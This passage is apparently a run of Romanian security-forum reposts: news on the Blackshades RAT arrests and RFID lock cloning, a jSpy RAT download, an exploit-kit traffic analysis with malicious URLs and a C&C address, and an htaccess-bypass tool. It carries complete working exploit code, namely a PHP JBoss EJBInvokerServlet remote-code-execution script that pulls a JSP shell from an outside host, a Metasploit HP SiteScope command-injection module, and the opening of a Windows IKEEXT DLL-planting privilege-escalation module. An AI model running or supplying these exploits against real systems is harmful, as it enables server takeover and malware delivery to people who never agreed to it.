    The RAT contained tools known as ‘spreaders’ that helped users of the RAT maximize the number of infections. The spreader tools generally worked by using computers that had already been infected to help spread the RAT further to other computers. For instance, in order to lure additional victims to click on malicious links that would install the RAT on their computers, the RAT allowed cybercriminals to send those malicious links to others via the initial victim’s social media service, making it appear as if the message had come from the initial victim.”

    News that the FBI and other national law enforcement organizations had begun rounding up Blackshades customers started surfacing online last week, when multiple denizens of the noob-friendly hacker forum Hackforums[dot]net began posting firsthand experiences of receiving a visit from local authorities related to their prior alleged Blackshades use. See the image gallery at the end of this post for a glimpse into the angst that accompanied that development.

    While there is a certain amount of schadenfreude in today’s action, the truth is that any longtime Blackshades customer who didn’t know this day would be coming should turn in his hacker card immediately. In June 2012, the Justice Department announced a series of indictments against at least two dozen individuals who had taken the bait and signed up to be active members of “Carderprofit,” a fraud forum that was created and maintained by the Federal Bureau of Investigation.

    Among those arrested in the CarderProfit sting was Michael Hogue, the alleged co-creator of Blackshades. That so many of the customers of this product are teenagers who wouldn’t know a command line prompt from a hole in the ground is evident by the large number of users who vented their outrage over their arrests and/or visits by the local authorities on Hackforums, which by the way was the genesis of the CarderProfit sting from Day One.

    In June 2010, Hackforums administrator Jesse Labrocca — a.k.a. “Omniscient” — posted a message to all users of the forum, notifying them that the forum would no longer tolerate the posting of messages about ways to buy and use the ZeuS Trojan, a far more sophisticated remote-access Trojan that is heavily used by cybercriminals worldwide and has been implicated in the theft of hundreds of millions of dollars from small- to mid-sized businesses worldwide.

    Screenshot-2014-05-19-11.59.06-600x362.png

    Hackforums admin Jesse “Omniscient” LaBrocca urging users to register at a new forum — Carderprofit.cc — a sting Web site set up by the FBI.

    That warning, shown in the screen shot above, alerted Hackforums users that henceforth any discussion about using or buying ZeuS was verboten on the site, and that those who wished to carry on conversations about this topic should avail themselves of a brand new forum that was being set up to accommodate them. And, of course, that forum was carderprofit[dot]eu.

    Interestingly, a large number of the individuals rounded up as part of the FBI’s CardProfit sting included several key leaders of LulzSec (including the 16-year-old individual responsible for sending a heavily armed police response to my home in March 2013).

    Screenshot-2014-05-19-11.59.44-600x355.png

    The CarderProfit homepage, which featured an end-user license agreement written by the FBI.

    In a press conference today, the FBI said its investigation has shown that Blackshades was purchased by at least several thousand users in more than 100 countries and used to infect more than half a million computers worldwide. The government alleges that one co-creator of Blackshades generated sales of more than $350,000 between September 2010 and April 2014. Information about that individual and others charged in this case can be found at this link.

    For a glimpse at what the recipients of all this attention went through these past few days, check out the images below.

    Sursa ‘Blackshades’ Trojan Users Had It Coming — Krebs on Security

  8. jSpy is a RAT developed in Java

    A free Java Remote Administration Tool

    jSpy will run on Windows, Mac OSX and Linux. jSpy was developed on a Mac ensuring that all features work on both UNIX and DOS Systems.

    jSpy uses a library called Kryonet developed by Esoterics Software. By using this library for networking, jSpy creates an environment where you can be rest assured you won't lose your clients.

    -Startup module for Linux Systems has not been implemented: Do not expect your linux clients to come back.

    Download: jSpy RAT - Developed in Java

    Pare interesant, l-a folosit cineva ? Sau altceva bazat pe Java ?

  9. Citywide RFID Master House Key? Already Broken

    By John Borland12.29.132:29 PM

    HAMBURG – In the bad old days, city apartment buildings often allowed entry to postal or emergency workers with a single master key, which was easily copied or sold on the black market.

    Many buildings are today switching to RFID-based key cards, citing an advance in security. Yet this claim is certainly suspect. Speaking at the Chaos Communication Congress (CCC) here, security researcher Adrian Dabrowski said a reverse-engineering project had let him open more than 90 percent of the electronically locked apartment doors in his home city of Vienna.

    The CCC picks locks of all kinds — digital, physical, or Lego.

    “When the key system was installed in my building, I was like: challenge accepted,” he told conference attendees Sunday. “Customers should not expect any significantly higher security from the new system than with the old system.”

    The use of RFID cards for master building locks is a particularly sensitive topic, as residents themselves generally lack access to the keys themselves, and are dependent on house managers to create a safe environment.

    Yet some entry system is needed for services such as garbage pickup, postal delivery and emergency personnel. Many of Vienna’s property developers have thus elected to use locks produced by a company called Begeh Schließsysteme, which as of last year had been installed at more than 9,000 sites across the city.

    The manufacturer advertises its key card as being uncloneable, and touts features such as the ability to blacklist stolen or revoked cards.

    Needing a unit to test, Dabrowski managed to persuade a wholesaler to sell him a Begeh lock system by pretending to be from an approved distributor. In tandem, he bought an inexpensive RFID reader, and built a card simulator device himself.

    With this in place, he needed cards – or at least their output – to test. For this purpose, he bought a mid-range RFID reader able to scan nearby cards, attaching a small external memory and battery to it. He then sent this to himself in a small parcel, which while in transit recorded all nearby RFID signals, including those associated with the postal-service key unlocking his own building’s door.

    “I thought that if someone opened it or found it, they’d think it was a terrorist or something. So I put a small note in the parcel saying it was an experiment, with my phone number,” he said. “But nobody did.”

    Armed with that key-card information, he was able to construct a simulation of a master card that worked with his test unit. He found the hardware standards to be similar to a leftover ski-area smart card he had on hand, and reprogrammed this to simulate a Begeh apartment-lock key.

    This wasn’t a perfect solution – it only opened 43 percent of the 110 apartment doors he subsequently tried. But 93 percent of the Begeh-locked doors tested proved vulnerable to his card emulator device, which he said he had constructed from materials costing less than €20 overall.

    Conclusion? This master door lock, at least, was no safer than the old mechanical keys. Worse, he said, there was no way to update the new lock systems once the security had been broken.

    Dabrowski said he had indirectly notified the company responsible for the locks (which accused him of working for a competitor). But he said the most important lesson was that future customers should ask questions before investing in a long-term security device.

    “Whenever you have a security solution, you are in kind of an arms race with the dark side of the world, so you need some kind of update path,” he said. “People who buy this system should be aware – they should ask about the support lifetime, and about ways to upgrade, because no security system lasts forever.”

    Sursa: Citywide RFID Master House Key? Already Broken | Threat Level | Wired.com

  10. Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object RCE

    <?php
    /*
    Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object
    Remote Code Execution

    google dork: inurl:status EJBInvokerServlet

    this was used successfully on Windows during a penetration test against
    McAfee Web Reporter 5.2.1 (tcp port 9111/http) gaining administrative privileges
    see: http://www.mcafee.com/it/downloads/downloads.aspx
    file tested: webreporter64bit.zip

    Usage:
    C:\PHP>php 9sg_ejb.php 192.168.0.1 id

    HTTP/1.1 200 OK
    Server: Apache-Coyote/1.1
    X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=2006101
    62339)/Tomcat-5.5
    Set-Cookie: JSESSIONID=E9EEE1D6AD27D64ED3835C1092C4FC29; Path=/
    Content-Type: text/html;charset=ISO-8859-1
    Content-Length: 43
    Date: Fri, 04 Oct 2013 07:25:48 GMT
    Connection: close


    uid=0(root) gid=0(root) groups=0(root)

    C:\PHP>

    ~ rgod ~
    */

    $host=$argv[1];
    $cmd=$argv[2];
    //$port=9111; //mcafee
    $port=80;

    //small jsp shell
    //change this if you want, url to the app to be deployed, keep it short
    $url="http://retrogod.altervista.org/a.war?";


    $url_len=pack("n",strlen($url));

    function hex_dump($data, $newline="\n") {
    static $from = '';
    static $to = '';
    static $width = 16; static $pad = '.';
    if ($from==='') {
    for ($i=0; $i<=0xFF; $i++) {
    $from .= chr($i);
    $to .= ($i >= 0x20 && $i <= 0x7E) ? chr($i) : $pad;
    }
    }
    $hex = str_split(bin2hex($data), $width*2);
    $chars = str_split(strtr($data, $from, $to), $width);
    $offset = 0;
    foreach ($hex as $i => $line) {
    echo sprintf('%6X',$offset).' : '.implode(' ', str_split($line,2)) . ' [' . $chars[$i] . ']' . $newline;
    $offset += $width;
    }
    }

    $frag_i=
    "\xac\xed\x00\x05\x73\x72\x00\x29\x6f\x72\x67\x2e\x6a\x62\x6f\x73". // ....sr.) org.jbos
    "\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d\x61\x72". // s.invoca tion.Mar
    "\x73\x68\x61\x6c\x6c\x65\x64\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f". // shalledI nvocatio
    "\x6e\xf6\x06\x95\x27\x41\x3e\xa4\xbe\x0c\x00\x00\x78\x70\x70\x77". // n...'A>. ....xppw
    "\x08\x78\x94\x98\x47\xc1\xd0\x53\x87\x73\x72\x00\x11\x6a\x61\x76". // .x..G..S .sr..jav
    "\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2". // a.lang.I nteger..
    "\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75". // .....8.. .I..valu
    "\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e". // exr..jav a.lang.N
    "\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00". // umber... ........
    "\x78\x70\x26\x95\xbe\x0a\x73\x72\x00\x24\x6f\x72\x67\x2e\x6a\x62". // xp&...sr .$org.jb
    "\x6f\x73\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d". // oss.invo cation.M
    "\x61\x72\x73\x68\x61\x6c\x6c\x65\x64\x56\x61\x6c\x75\x65\xea\xcc". // arshalle dValue..
    "\xe0\xd1\xf4\x4a\xd0\x99\x0c\x00\x00\x78\x70\x77";

    $frag_ii="\x00";

    $frag_iii=
    "\xac\xed\x00\x05\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e". // .....ur. .[Ljava.
    "\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f". // lang.Obj ect;..X.
    "\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x04\x73\x72\x00". // .s)l...x p....sr.
    "\x1b\x6a\x61\x76\x61\x78\x2e\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e". // .javax.m anagemen
    "\x74\x2e\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x0f\x03\xa7\x1b". // t.Object Name....
    "\xeb\x6d\x15\xcf\x03\x00\x00\x78\x70\x74\x00\x21\x6a\x62\x6f\x73". // .m.....x pt.!jbos
    "\x73\x2e\x73\x79\x73\x74\x65\x6d\x3a\x73\x65\x72\x76\x69\x63\x65". // s.system :service
    "\x3d\x4d\x61\x69\x6e\x44\x65\x70\x6c\x6f\x79\x65\x72\x78\x74\x00". // =MainDep loyerxt.
    "\x06\x64\x65\x70\x6c\x6f\x79\x75\x71\x00\x7e\x00\x00\x00\x00\x00". // .deployu q.~.....
    "\x01\x74".
    $url_len.
    $url.
    "\x75\x72\x00".
    "\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61". // ur..[ Ljava.la
    "\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d". // ng.Strin g;..V...
    "\x7b\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00\x10\x6a\x61". // {G...xp. ...t..ja
    "\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67";

    $frag_iv=
    "\x0d\xd3".
    "\xbe\xc9\x78\x77\x04\x00\x00\x00\x01\x73\x72\x00\x22\x6f\x72\x67". // ..xw.... .sr."org
    "\x2e\x6a\x62\x6f\x73\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f". // .jboss.i nvocatio
    "\x6e\x2e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x4b\x65\x79\xb8". // n.Invoca tionKey.
    "\xfb\x72\x84\xd7\x93\x85\xf9\x02\x00\x01\x49\x00\x07\x6f\x72\x64". // .r...... ..I..ord
    "\x69\x6e\x61\x6c\x78\x70\x00\x00\x00\x05\x73\x71\x00\x7e\x00\x05". // inalxp.. ..sq.~..
    "\x77\x0d\x00\x00\x00\x05\xac\xed\x00\x05\x70\xfb\x57\xa7\xaa\x78". // w....... ..p.W..x
    "\x77\x04\x00\x00\x00\x03\x73\x71\x00\x7e\x00\x07\x00\x00\x00\x04". // w.....sq .~......
    "\x73\x72\x00\x23\x6f\x72\x67\x2e\x6a\x62\x6f\x73\x73\x2e\x69\x6e". // sr.#org. jboss.in
    "\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x49\x6e\x76\x6f\x63\x61\x74". // vocation .Invocat
    "\x69\x6f\x6e\x54\x79\x70\x65\x59\xa7\x3a\x1c\xa5\x2b\x7c\xbf\x02". // ionTypeY .:..+|..
    "\x00\x01\x49\x00\x07\x6f\x72\x64\x69\x6e\x61\x6c\x78\x70\x00\x00". // ..I..ord inalxp..
    "\x00\x01\x73\x71\x00\x7e\x00\x07\x00\x00\x00\x0a\x70\x74\x00\x0f". // ..sq.~.. ....pt..
    "\x4a\x4d\x58\x5f\x4f\x42\x4a\x45\x43\x54\x5f\x4e\x41\x4d\x45\x73". // JMX_OBJE CT_NAMEs
    "\x72\x00\x1b\x6a\x61\x76\x61\x78\x2e\x6d\x61\x6e\x61\x67\x65\x6d". // r..javax .managem
    "\x65\x6e\x74\x2e\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x0f\x03". // ent.Obje ctName..
    "\xa7\x1b\xeb\x6d\x15\xcf\x03\x00\x00\x78\x70\x74\x00\x21\x6a\x62". // ...m.... .xpt.!jb
    "\x6f\x73\x73\x2e\x73\x79\x73\x74\x65\x6d\x3a\x73\x65\x72\x76\x69". // oss.syst em:servi
    "\x63\x65\x3d\x4d\x61\x69\x6e\x44\x65\x70\x6c\x6f\x79\x65\x72\x78". // ce=MainD eployerx
    "\x78"; // x

    $data=$frag_i.pack("v",strlen($frag_iii)+8).$frag_ii.pack("n",strlen($frag_iii)).$frag_iii.$frag_iv;

    //$pk=""POST /invoker/JMXInvokerServlet/ HTTP/1.1\r\n". //the same ...

    $pk="POST /invoker/EJBInvokerServlet/ HTTP/1.1\r\n".
    "ContentType: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation\r\n".
    "Accept-Encoding: x-gzip,x-deflate,gzip,deflate\r\n".
    "User-Agent: Java/1.6.0_21\r\n".
    "Host: ".$host.":".$port."\r\n".
    "Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2\r\n".
    "Connection: keep-alive\r\n".
    "Content-type: application/x-www-form-urlencoded\r\n".
    "Content-Length: ".strlen($data)."\r\n\r\n".
    $data;
    echo hex_dump($pk)."\n";
    $fp=fsockopen($host,$port,$e,$err,3);
    fputs($fp,$pk);
    $out=fread($fp,8192);
    fclose($fp);
    echo hex_dump($out)."\n";

    sleep(5);

    $pk="GET /a/pwn.jsp?cmd=".urlencode($cmd)." HTTP/1.0\r\n".
    "Host: ".$host.":".$port."\r\n".
    "Connection: Close\r\n\r\n";

    echo hex_dump($pk)."\n";
    $fp=fsockopen($host,$port,$e,$err,3);
    fputs($fp,$pk);
    $out="";
    while (!feof($fp)) {
    $out.=fread($fp,8192);
    }
    fclose($fp);
    echo $out;
    ?>

    Sursa: Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object RCE

  11. screenshot_2013-10-02_002.png

    Yes it's another Exploit Kit. Good news (just because it should be less boring) there is more than two jar in that one.

    Thanks to Eoin Miller for the inputs that allowed me to write this post.

    f56.jpg

    Talking about owls, if you never heard of Moloch (link to its presentation at ShmooCon 2013) you should give it a try (link to github) (good pcap indexer...yes...one day, thanks to tools like this, you'll see Pcap here too ;) )

    So HiMan is not the real name of this Exploit Kit. It seems to be High Load but as HighLoad is a reputable security conference that stands in Russia we won't use this name. (for the same kind of reasons, we are now talking about what we previoulsy called PopAds as Magnitude).

    screenshot_2013-09-30_029.png

    I didn't heard about any public advert for this Exploit Kit, but ping me if there is and you know where :)

    What is tricky with this one is that it seems there is whitelisting filter on referer.

    Wrong referer : bye ! (obviously wrong country, wrong browser, known ip..same way).

    screenshot_2013-10-02_003.png

    (don't know why it's not being done directly on landing... all stats related functions in index ? ).

    Post to index.php contains upper referer

    screenshot_2013-10-02_005.png

    To study this should help knowing which pierced armor we must show HiMan to get all the bullets :

    screenshot_2013-10-01_005.png

    CVE-2011-3544 : Java2

    (cause CVE-2013-2465 crash for older version of jre6)

    screenshot_2013-10-02_013.png

    GET http://fifallllolka .info/xuguczel.php

    200 OK (text/html)

    GET http://fifallllolka .info/js/jquery.js

    200 OK (application/javascript)

    POST http://fifallllolka .info/index.php

    200 OK (text/html)

    screenshot_2013-10-02_014.png

    java2 in HiMan 2013-10-02

    screenshot_2013-10-02_016.png

    We can easily see this in the noise.

    GET http://fifallllolka .info/xufomav/b.jar

    200 OK (application/java-archive) 378b01a6c3969089d0779aeb80185627

    GET http://fifallllolka .info/com.class 404 Not Found (text/html)

    GET http://fifallllolka .info/edu.class 404 Not Found (text/html)

    GET http://fifallllolka .info/net.class 404 Not Found (text/html)

    GET http://fifallllolka .info/org.class 404 Not Found (text/html)

    GET http://fifallllolka .info/com.class 404 Not Found (text/html)

    GET http://fifallllolka .info/edu.class 404 Not Found (text/html)

    GET http://fifallllolka .info/net.class 404 Not Found (text/html)

    GET http://fifallllolka .info/org.class 404 Not Found (text/html)

    screenshot_2013-10-02_017.png

    Getting System Properties for Stats Purposes

    Piece of dwq.class in b.jar - HiMan 2013-10-02

    screenshot_2013-10-02_015.png

    And passing them to payload URLs

    Piece cdcdc44 class in b.jar - HiMan 2013-10-02

    GET http://fifallllolka .info/xufomav/kds.php?ex=rhi&name=BOBOB&country=US&os=Windows+XP&ver=1.6.0_16

    200 OK (application/octet-stream)

    Payload is a zip

    screenshot_2013-10-02_012.png

    containing Flimrans Ransomware :

    screenshot_2013-10-02_010.png

    -----------Out of topic : Payload-----------

    Flimrans : 9eb1f89a74e708c27869eadb0b421ca6

    (A ransomware that seems to have been first pushed in Flimkit (as dedicated family) in middle of may 2013. This was the same kind of couple as : Kore with Urausy/FakeAV.

    I will make a post about it really soon. It's starting to be widely spread).

    C&C :

    95.211.239.222

    16265 | 95.211.0.0/16 | LEASEWEB | NL | LEASEWEB.COM | LEASEWEB B.V.

    GET /IccpytZxrc79KfIjQojAavSfYfhOBm4= HTTP/1.1

    Host: utipiguty.de

    Cache-Control: no-cache

    Analysis by Joe Sandbox Cloud

    --------------------------------------------

    CVE-2013-2465 : Java1

    screenshot_2013-10-02_007.png

    GET http://fifallllllolka .info/sacixudy.php

    200 OK (text/html)

    GET http://fifallllllolka .info/js/jquery.js

    200 OK (application/javascript)

    POST http://fifallllllolka .info/index.php

    200 OK (text/html)

    screenshot_2013-10-02_008.png

    java1() in HiMan 2013-10-02

    GET http://fifallllllolka .info/sivajup/a.jar 4c1aabd2f558c453555da5ff7a7559de

    200 OK (application/java-archive)

    screenshot_2013-10-02_009.png

    Piece of CVE-2013-2465 in a.jar

    GET http://fifallllllolka .info/sivajup/kds.php?ex=jre&name=BOBOB&country=US&os=Windows+7&ver=1.6.0_45200 OK (application/octet-stream)

    CVE-2013-2465 with embedded jnlp (to avoid Security Warning): java3

    I'll fly over that one.

    screenshot_2013-10-02_018.png

    GET http://fifalllolka .info/xalbigki.php

    200 OK (text/html)

    GET http://fifalllolka .info/js/jquery.js

    304 Not Modified () (artifact - cached here)

    POST http://fifalllolka .info/index.php

    200 OK (text/html)

    screenshot_2013-10-02_019.png

    java3 in HiMan 2013-10-02

    GET http://fifalllolka .info/jumyvvu/a.jar 4c1aabd2f558c453555da5ff7a7559de (same as previously)

    200 OK (application/java-archive)

    GET http://fifalllolka .info/jumyvvu/kds.php?ex=jre&name=BOBOB&country=US&os=Windows+XP&ver=1.7.0_11

    200 OK (application/octet-stream)

    CVE-2010-0188 :

    It's assumption that it's libtiff as there is an Embedded file. Didn't spend enough time on it .Wepawet and VirusTotal were helpless here.

    screenshot_2013-10-02_020.png

    GET http://aakrinopidarasti .info/vibqilro.php

    200 OK (text/html)

    GET http://aakrinopidarasti .info/js/jquery.js

    200 OK (application/javascript)

    POST http://aakrinopidarasti .info/index.php

    200 OK (text/html)

    GET http://aakrinopidarasti .info/gadgepu/d.php?h=h11t11t11p11%3A11%2F11%2F11a11a11k11r11i11n11o11p11i11d11a11r11a11s11t11i11.11i11n11f11o11%2F11g11a11d11g11e11p11u11%2F11k11d11s11.11p11h11p11%3F11e11x11%3D11a11d11%2611n11a11m11e11%3D11B11O11B11O11B11%2611c11o11u11n11t11r11y11%3D11U11S11

    200 OK (application/pdf)

    screenshot_2013-10-02_023.png

    HiMan's PDF in PDFStreamDumper.

    screenshot_2013-10-02_022.png

    The object after some light deobfus

    (mainly replacing "hello prettylame iwnzzz" by %)

    screenshot_2013-10-02_024.png

    [Have to stop here for now- will digg in it to findout why 2 payloads call ]

    GET http://aakrinopidarasti .info/gadgepu/kds.php?ex=ad&name=BOBOB&country=US

    200 OK (application/octet-stream) (same Flimrans)

    GET http://aakrinopidarasti .info/gadgepu/kds.php?ex=ad&name=BOBOB&country=US;1

    200 OK (application/octet-stream)

    CVE-2013-2551 : (working here....)

    Discovered by Vupen and exploited at Pwn2Own 2013

    screenshot_2013-10-02_025.png

    CVE-2013-2551 in HiMan - 2013-10-01

    GET http://akrinopidarasti .info/wywetukr.php

    200 OK (text/html)

    GET http://akrinopidarasti .info/js/jquery.js

    200 OK (application/javascript)

    POST http://akrinopidarasti .info/index.php

    200 OK (text/html)

    screenshot_2013-10-02_026.png

    IE Check Before Fireing

    (note : on another pass)

    screenshot_2013-10-02_027.png

    Cleaning to see a little better

    (note : it's another pass so pattern do not match this one)

    GET http://akrinopidarasti .info/qywurro/sh.php?i=h79t79t79p79%3A79%2F79%2F79a79k79r79i79n79o79p79i79d79a79r79a79s79t79i79.79i79n79f79o79%2F79q79y79w79u79r79r79o79%2F79k79d79s79.79p79h79p79%3F79e79x79%3D79a79d79%2679n79a79m79e79%3D79B79O79B79O79B79%2679c79o79u79n79t79r79y79%3D79U79S79

    200 OK (text/html)

    screenshot_2013-10-02_030.png

    Piece of CVE-2013-2551

    GET http://37.200.65.58/222.exe

    200 OK (application/octet-stream)

    92c2ad1ca04e431100313b9468842c0d Content-Length: 1536

    screenshot_2013-10-02_029.png

    VT TimeStamp

    What happen once "infected" ?

    screenshot_2013-10-02_002.png

    Exploitation Graph :

    screenshot_2013-10-02_032.png

    Files :

    4 fiddlers and payloads (Owncloud via goo.gl)

    Sursa: Malware don't need Coffee: HiMan Exploit Kit. Say Hi to one more.

  12. HTExploit [bypassing .htaccess restictions]

    HTExploit (HiperText access Exploit) is an open-source tool written in Python that exploits a weakness in the way that .htaccess files can be configured to protect a web directory with an authentication process.

    How to use

    - Unzip the archive

    tar xzvf nomearchivio.tar.gz

    -Enter the folder

    cd name folder

    - You will find the file 'htexploit' add. Py final

    - Launch

    python htexploit.py -u [www.xxx.it]

    - Find the output folder

    Download: HTExploit - Bypassing htaccess Restrictions

    http://www.mkit.com.ar/labs/htexploit/source/htexploit-0.77.tar.gz

    Sursa: http://trojanforge.com

  13. HP SiteScope is a monitoring software focused on monitoring the availability and performance of distributed IT infrastructures includes Servers, Network, Applications, operating systems, Internet services and various IT Enterprise components. HP Software work on Simple Object Access Protocol SOAP

    HP SiteScope Remote Code Execution

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # web site for more information on licensing and terms of use.
    # http://metasploit.com/
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
    Rank = ManualRanking

    HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }

    include Msf::Exploit::Remote::HttpClient
    include Msf::Exploit::CmdStagerVBS

    def initialize(info = {})
    super(update_info(info,
    'Name' => 'HP SiteScope Remote Code Execution',
    'Description' => %q{
    This module exploits a code execution flaw in HP SiteScope.
    The vulnerability exists on the opcactivate.vbs script, which
    is reachable from the APIBSMIntegrationImpl AXIS service, and
    uses WScript.Shell.run() to execute cmd.exe with user provided
    data. Note which the opcactivate.vbs component is installed
    with the (optional) HP Operations Agent component. The module
    has been tested successfully on HP SiteScope 11.20 (with HP
    Operations Agent) over Windows 2003 SP2.
    },
    'Author' =>
    [
    'rgod <rgod[at]autistici.org>', # Vulnerability discovery
    'juan vazquez' # Metasploit module
    ],
    'License' => MSF_LICENSE,
    'References' =>
    [
    [ 'CVE', '2013-2367'],
    [ 'OSVDB', '95824' ],
    [ 'BID', '61506' ],
    [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-205/' ]
    ],
    'Privileged' => true,
    'Platform' => 'win',
    'Arch' => ARCH_X86,
    'Targets' =>
    [
    [ 'HP SiteScope 11.20 (with Operations Agent) / Windows 2003 SP2', {} ]
    ],
    'DefaultTarget' => 0,
    'DefaultOptions' =>
    {
    'DECODERSTUB' => File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64_noquot")
    },
    'DisclosureDate' => 'Jul 29 2013'))

    register_options(
    [
    Opt::RPORT(8080),
    OptString.new('TARGETURI', [true, 'Path to SiteScope', '/SiteScope/'])
    ], self.class)
    end

    def uri
    uri = normalize_uri(target_uri.path)
    uri << '/' if uri[-1,1] != '/'
    return uri
    end

    def check

    op = rand_text_alpha(8 + rand(10))
    key = rand_text_alpha(8 + rand(10))
    value = rand_text_alpha(8 + rand(10))

    res = send_soap_request(op, key, value)

    if res and res.code == 200 and res.body =~ /runOMAgentCommandResponse/
    return Exploit::CheckCode::Detected
    end

    return Exploit::CheckCode::Safe
    end

    def exploit
    @peer = "#{rhost}:#{rport}"

    print_status("#{@peer} - Delivering payload...")

    # The path to the injection is something like:
    # * Java exec => cscript => WScript.Shell => cmd.exe (injection happens)
    # Empirically has been tested a 1500 value for :linemax makes it work
    # reliable
    execute_cmdstager({:linemax => 1500})
    end

    def get_vbs_string(str)
    vbs_str = ""
    str.each_byte { |b|
    vbs_str << "Chr(#{b})+"
    }

    return vbs_str.chomp("+")
    end

    # Make the modifications required to the specific encoder
    # This exploit uses an specific encoder because quotes (")
    # aren't allowed when injecting commands
    def execute_cmdstager_begin(opts)
    var_decoded = @stager_instance.instance_variable_get(:@var_decoded)
    var_encoded = @stager_instance.instance_variable_get(:@var_encoded)
    decoded_file = "#{var_decoded}.exe"
    encoded_file = "#{var_encoded}.b64"
    @cmd_list.each { |command|
    # Because the exploit kills cscript processes to speed up and reliability
    command.gsub!(/cscript \/\/nologo/, "wscript //nologo")
    command.gsub!(/CHRENCFILE/, get_vbs_string(encoded_file))
    command.gsub!(/CHRDECFILE/, get_vbs_string(decoded_file))
    }
    end

    def execute_command(cmd, opts={})
    # HTML Encode '&' character
    # taskkill allows to kill the cscript process which is triggering the
    # different operations performed by the OPACTIVATE command. It speeds
    # up exploitation and improves reliability (some processes launched can die
    # due to the fake activation). But this line also will kill other cscript
    # legit processes which could be running on the target host. Because of it
    # the exploit has a Manual ranking
    command = ""127.0.0.1 && "
    command << cmd.gsub(/&/, "&")
    command << " && taskkill /F /IM cscript.exe ""

    res = send_soap_request("OPCACTIVATE", "omHost", command)

    if res.nil? or res.code != 200 or res.body !~ /runOMAgentCommandResponse/
    fail_with(Failure::Unknown, "#{@peer} - Unexpected response, aborting...")
    end

    end

    def send_soap_request(op, key, value)
    data = "<soapenv:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" "
    data << "xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:api=\"http://Api.freshtech.COM\">"
    data << "<soapenv:Header/>"
    data << "<soapenv:Body>"
    data << "<api:runOMAgentCommand soapenv:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
    data << "<in0 xsi:type=\"x-:Map\" xmlns:x-=\"http://xml.apache.org/xml-soap\">"
    data << "<item xsi:type=\"x-:mapItem\">"
    data << "<key xsi:type=\"xsd:string\">#{key}</key>"
    data << "<value xsi:type=\"xsd:string\">#{value}</value>"
    data << "</item>"
    data << "</in0>"
    data << "<in1 xsi:type=\"xsd:string\">#{op}</in1>"
    data << "</api:runOMAgentCommand>"
    data << "</soapenv:Body>"
    data << "</soapenv:Envelope>"

    res = send_request_cgi({
    'uri' => normalize_uri(uri, 'services', 'APIBSMIntegrationImpl'),
    'method' => 'POST',
    'ctype' => 'text/xml; charset=UTF-8',
    'data' => data,
    'headers' => {
    'SOAPAction' => '""'
    }
    })

    return res
    end

    end



    Sursa: HP SiteScope Remote Code Execution

  14. IKE and AuthIP IPsec Keyring Modules Service (IKEEXT) Missing DLL

    This module exploits a missing DLL loaded by the 'IKE and AuthIP Keyring Modules' (IKEEXT) service which runs as SYSTEM, and starts automatically in default installations of Vista-Win8. It requires an insecure bin path to plant the DLL payload.

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # web site for more information on licensing and terms of use.
    # http://metasploit.com/
    ##

    require 'msf/core'
    require 'msf/core/post/common'
    require 'msf/core/post/windows/services'
    require 'msf/core/post/windows/priv'

    class Metasploit3 < Msf::Exploit::Local
    Rank = GoodRanking

    include Msf::Exploit::EXE
    include Msf::Exploit::FileDropper
    include Msf::Post::File
    include Msf::Post::Windows::Priv
    include Msf::Post::Windows::Services
    include Msf::Post::Windows::Accounts

    def initialize(info={})
    super( update_info( info,
    'Name' => 'IKE and AuthIP IPsec Keyring Modules Service (IKEEXT) Missing DLL',
    'Description' => %q{
    This module exploits a missing DLL loaded by the 'IKE and AuthIP Keyring Modules'
    (IKEEXT) service which runs as SYSTEM, and starts automatically in default
    installations of Vista-Win8.
    It requires an insecure bin path to plant the DLL payload.
    },
    'References' =>
    [
    ['URL', 'https://www.htbridge.com/advisory/HTB23108'],
    ['URL', 'https://www.htbridge.com/vulnerability/uncontrolled-search-path-element.html']
    ],
    'DisclosureDate' => "Oct 09 2012",
    'License' => MSF_LICENSE,
    'Author' =>
    [
    'Ben Campbell <eat_meatballs@hotmail.co.uk>'
    ],
    'Platform' => [ 'win'],
